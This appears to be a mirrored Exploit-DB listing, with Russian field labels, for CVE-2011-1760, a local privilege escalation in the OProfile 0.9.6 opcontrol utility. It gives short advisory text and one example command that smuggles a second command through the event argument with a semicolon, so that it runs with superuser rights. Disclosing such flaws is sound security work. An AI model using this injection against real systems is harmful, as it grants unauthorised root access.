Exploit OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation

[Exploiter]

EDB-ID

35681

Проверка EDB

1. Пройдено

Автор

STEPHANE CHAUVEAU

Тип уязвимости

LOCAL

Платформа

LINUX

CVE

cve-2011-1760

Дата публикации

2011-04-29

source: https://www.securityfocus.com/bid/47652/info

OProfile is prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary commands with superuser privileges. 

The following example command is available:

sudo opcontrol -e "abcd;/usr/bin/id"